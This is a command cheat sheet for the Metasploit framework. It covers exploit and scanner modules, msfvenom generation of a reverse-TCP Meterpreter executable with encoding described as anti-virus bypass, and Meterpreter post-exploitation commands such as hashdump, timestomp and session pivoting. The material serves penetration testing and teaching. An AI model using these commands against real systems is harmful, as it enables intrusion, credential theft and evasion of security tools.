The Metasploit Project is a computer security project that provides information about vulnerabilities and helps in the development of penetration tests and IDS signatures. Metasploit is a very popular tool used by pentest experts.
msf > search [regex]
msf > use exploit/[ExploitPath]
msf > set PAYLOAD [PayloadPath]
msf > show options
msf > set [Option] [Value]
msf > exploit
msf > use auxiliary/scanner/portscan/tcp
msf > set RHOSTS 192.168.10.0/24
msf > run
msf > use auxiliary/gather/dns_enum
msf > set DOMAIN target.tgt
msf > run
msf > use auxiliary/server/ftp
msf > set FTPROOT /tmp/ftproot
msf > run
msf > use auxiliary/server/socks4
msf > run
msfvenom is a tool that can be used to generate Metasploit payloads as standalone files and optionally encode them. It replaces the msfpayload and msfencode tools. Run it with '-l payloads' to get a list of payloads.
$ msfvenom -p [PayloadPath] -f [FormatType] LHOST=[LocalHost (if reverse conn.)] LPORT=[LocalPort]
$ msfvenom -p windows/meterpreter/reverse_tcp -f exe LHOST=192.168.1.1 LPORT=4444 > met.exe
Format types:
exe: Executable
pl: Perl
rb: Ruby
raw: Raw shellcode
c: C code
msfvenom can also apply a level of encoding for anti-virus bypass. Run msfvenom with -l encoders to get a list of encoders.
$ msfvenom -p [Payload] -e [Encoder] -f [FormatType] -i [EncodeIterations] LHOST=[LocalHost (if reverse conn.)] LPORT=[LocalPort]
$ msfvenom -p windows/meterpreter/reverse_tcp -i 5 -e x86/shikata_ga_nai -f exe LHOST=192.168.1.1 LPORT=4444 > mal.exe
? / help: Display a summary of commands
exit / quit: Exit the Meterpreter session
sysinfo: Show the system name and OS type
shutdown / reboot: Self-explanatory
cd: Change directory
lcd: Change directory on local (attacker’s) machine
pwd / getwd: Display current working directory
ls: Show the contents of the directory
cat: Display the contents of a file on screen
download / upload: Move files to/from the target machine
mkdir / rmdir: Make / remove directory
edit: Open a file in the default editor (typically vi)
getpid: Display the process ID that Meterpreter is running inside
getuid: Display the user ID that Meterpreter is running with
ps: Display process list
kill: Terminate a process given its process ID
execute: Run a given program with the privileges of the process the Meterpreter is loaded in
migrate: Jump to a given destination process ID
ipconfig: Show network interface information
portfwd: Forward packets through TCP session
route: Manage/view the system’s routing table
idletime: Display the duration that the GUI of the target machine has been idle
uictl [enable/disable] [keyboard/mouse]: Enable/disable either the mouse or keyboard of the target machine
screenshot: Save a screenshot of the target machine as an image
use [module]: Load the specified module
Examples:
use priv: Load the priv module
hashdump: Dump the hashes from the box
timestomp: Alter NTFS file timestamps
msf > exploit -z
msf > exploit -j
List jobs (exploit listeners): msf > jobs -l
msf > jobs -k [JobID]
msf > sessions -l
msf > sessions -i [SessionID]
meterpreter > <Ctrl+Z>
or
meterpreter > background
All modules run against the target subnet will be pivoted through this session.
msf > route add [Subnet to Route To] [Subnet Netmask] [SessionID]